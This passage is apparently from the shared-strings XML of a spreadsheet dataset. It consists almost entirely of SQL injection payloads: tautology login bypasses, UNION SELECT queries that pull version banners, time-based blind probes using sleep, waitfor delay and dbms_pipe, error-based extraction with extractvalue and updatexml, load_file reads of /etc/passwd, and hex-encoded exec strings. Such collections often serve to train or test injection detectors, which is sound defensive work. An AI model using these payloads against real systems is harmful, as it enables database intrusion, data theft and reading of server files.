    <t xml:space="preserve"> select * from users where id = 1 or " ( #" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or !&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 *\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1&lt;@$,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $ 1 = 1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( \. )  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>or 0 = 0 #</t>
  </si>
  <si>
    <t xml:space="preserve"> or '' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> ( s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or ""&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1;SELECT *</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1||@,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> union select * from users where login  =  char ...</t>
  </si>
  <si>
    <t xml:space="preserve"> or 0 = 0 #</t>
  </si>
  <si>
    <t>;s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ";1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + \+%1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' + @ 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>; exec xp_regread</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 = 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1&lt;@.. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&lt;@. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "{." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( {" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>hi' )  or  ( 'a' = 'a</t>
  </si>
  <si>
    <t xml:space="preserve"> and 1 in  ( select var from temp ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select .1$_,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 'x' = 'x</t>
  </si>
  <si>
    <t>&amp;1c</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + ( \ )  union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>a' waitfor delay '0:0:10'--</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&amp;&amp;1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>{s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \+&lt;$ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>0x77616974666F722064656C61792027303A303A313027 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( $+ )  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( ." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 3 = 3</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $+&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t xml:space="preserve"> or username like char ( 37 ) ;</t>
  </si>
  <si>
    <t>; execute immediate 'sel' || 'ect us' || 'er'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1 ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> union select 1,load_file ( '/etc/passwd' ) ,1,1,1;</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ", ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@$_ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>'hi' or 'x' = 'x';</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1. &lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + $+*\ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;1## union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 %!&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 %$ 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 0 = 0 #"</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select .1_,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"@ union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@$$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>_x0018_ or 3 = 3 --</t>
  </si>
  <si>
    <t xml:space="preserve"> or 'unusual'  =  'unusual'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or $+&lt;1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "]1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">declare @q nvarchar  ( 200 )  select @q  =  0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec ( @q ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 %!&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>' or 1 = 1 or '' = '</t>
  </si>
  <si>
    <t>declare @q nvarchar  ( 200 )  select @q  =  0x770061 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select !&lt;@,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$ 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"; = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 'text' &gt; 't'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1   or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 = 1 or '' = '</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or  ( \+ )  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$+. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' *$ . or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"{ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select  ( \ ) ,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>"a"" or 1 = 1--"</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"; union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#". union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 *1 union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> $ ( sleep 50 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1.&lt;@$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>' )  or  ( 'x' = 'x</t>
  </si>
  <si>
    <t xml:space="preserve"> or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>or 0 = 0 #"</t>
  </si>
  <si>
    <t>declare @s varchar  ( 200 )  select @s  =  0x73656c6 ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "1&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + $+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@.$ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select @ $_,version (  )  -- 1</t>
  </si>
  <si>
    <t>" or 0 = 0 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#". union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 2 between 1 and 3</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select  ( \. ) ,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 + ( 1 )  union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ",;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> or 1 --'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "$[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ".@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "]{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \.&lt;\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>1s</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 union select 1||1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select $*$,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 &lt;@&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>%27 or 1 = 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select +\.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' union select ||/1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or ". ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve">or 1 = 1 or "" = </t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "?#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#"? = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "%{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or \.&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' * ( \ )  or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "? ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or "&amp; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' %!&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>or 1 = 1 --</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or " ( ]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> )  or  ( 'a' = 'a</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or \.&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or ||/1 = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 +$+ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = 1 or 1#" (  union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t xml:space="preserve"> select * from users where id = '1' or @ @1 = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1',iif ( 7475 = 7475,1,1/0 ) </t>
  </si>
  <si>
    <t>1%' )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'cuav' = 'cuav</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1' )  where 4092 = 4092 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( 'medg' = 'medg</t>
  </si>
  <si>
    <t>1' )  as zmvn where 2887 = 2887 union all select null--</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 7711 = 7711 )  then 1 else 7711* ( select 7711 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'jzwq' where 3289 = 3289 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" where 8387 = 8387</t>
  </si>
  <si>
    <t>1'  )  )   as bswc where 1635 = 1635 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  #</t>
  </si>
  <si>
    <t>-8758' union all select 6885,6885,6885,6885,6885,6885,6885,6885--</t>
  </si>
  <si>
    <t>-7514%"  )  )   )  or 2448 = 8797#</t>
  </si>
  <si>
    <t>-7808"  )  )   as jgkk where 9230 = 9230 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1 )  where 3915 = 3915 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1' where 2202 = 2202 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'ymad' like 'ymad</t>
  </si>
  <si>
    <t>1%" )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1%' and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5--</t>
  </si>
  <si>
    <t>select  ( case when  ( 1093 = 7693 )  then 1093 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>-9072 )  as saot where 2278 = 2278 order by 1#</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select  ( case when  ( 8179 = 1246 )  then 1 else 0x28 end  )  )   and   (  (  "xxeu" = "xxeu</t>
  </si>
  <si>
    <t>1' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and 'idxa' = 'idxa</t>
  </si>
  <si>
    <t>1'+ ( select hett where 7228 = 7228</t>
  </si>
  <si>
    <t>1%" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "%" = "</t>
  </si>
  <si>
    <t>1%" )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-1772  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char (</t>
  </si>
  <si>
    <t>1" )  where 9680 = 9680 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'ycya' from dual where 3536 = 3536 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( "kxws" like "kxws</t>
  </si>
  <si>
    <t>1 where 8389 = 8389 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1" )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "hsaw" = "hsaw</t>
  </si>
  <si>
    <t>-8923'+ ( select xgvz where 9858 = 9858 union all select 9858,9858,9858#</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 5217 = 5217 )  then 1 else 5217* ( select 5217 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>-2036' )  or  ( 8459 = 8459 ) *4906 and  ( 'hjeu' = 'hjeu</t>
  </si>
  <si>
    <t>1%"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>-7950 where 9619 = 9619 union all select 9619,9619,9619,9619--</t>
  </si>
  <si>
    <t>1" )  where 1212 = 1212 and 8475 = 5864</t>
  </si>
  <si>
    <t>1  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>-7815' union all select 2638,2638,2638,2638,2638--</t>
  </si>
  <si>
    <t>1%' )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-1123'  )  )   )  union all select 6735,6735,6735,6735,6735,6735,6735,6735#</t>
  </si>
  <si>
    <t>1" )  where 1807 = 1807</t>
  </si>
  <si>
    <t>1' )  as mgko where 1828 = 1828 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'dsjg' where 2402 = 2402 and 1947 = 7472--</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1" )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select 9100 =  ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  "uquh" = "uquh</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'dfxd' like 'dfxd</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 3876 = 2077 )  then 1 else 0x28 end  )  )   and   (  (  'hqcz' like 'hqcz</t>
  </si>
  <si>
    <t>-9014%' )  union all select 4211,4211,4211,4211,4211,4211#</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5141 = 5141 )  then  ( ascii ( regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )   )  else 5141/ ( select 0 from  ( values ( 0  )  )   )  end )  from  ( values ( 0  )  )   ) </t>
  </si>
  <si>
    <t>1'|| ( select 'pxkz' where 2207 = 2207 and  ( 3020 = 3020 ) *6703 ) ||'</t>
  </si>
  <si>
    <t>1" )  and elt ( 1210 = 1210,sleep ( 5  )  )   and  ( "cwwv" like "cwwv</t>
  </si>
  <si>
    <t>1" )  as ghpx where 2873 = 2873 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1' )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( 'ekqv' = 'ekqv</t>
  </si>
  <si>
    <t xml:space="preserve">-4032"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 </t>
  </si>
  <si>
    <t>-3822"  )  )   as dftp where 2817 = 2817 union all select 2817,2817,2817,2817,2817,2817#</t>
  </si>
  <si>
    <t>1 where 7882 = 7882</t>
  </si>
  <si>
    <t>1"  )  )   )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1  )  )   as krzi where 8727 = 8727 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1 )  where 2679 = 2679 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   as fwxq where 9935 = 9935 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-3370' in boolean mode )  union all select 3432,3432,3432,3432#</t>
  </si>
  <si>
    <t xml:space="preserve"> end ) ||'</t>
  </si>
  <si>
    <t>1' )  and make_set ( 7187 = 4625,4625 )  and  ( 'diai' like 'diai</t>
  </si>
  <si>
    <t>if ( 9770 = 9748 )  select 9770 else drop function zyuo--</t>
  </si>
  <si>
    <t>-3749" or elt ( 1032 = 1032,3623 )  and "mzrw" = "mzrw</t>
  </si>
  <si>
    <t>1'  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>1 where 6365 = 6365</t>
  </si>
  <si>
    <t>select  ( case when  ( 9434 = 2780 )  then 9434 else 9434* ( select 9434 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>1%" )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-6512'+ ( select 'zdjx' where 5454 = 5454 order by 1--</t>
  </si>
  <si>
    <t>1'+ ( select gguu where 7809 = 7809 union all select null--</t>
  </si>
  <si>
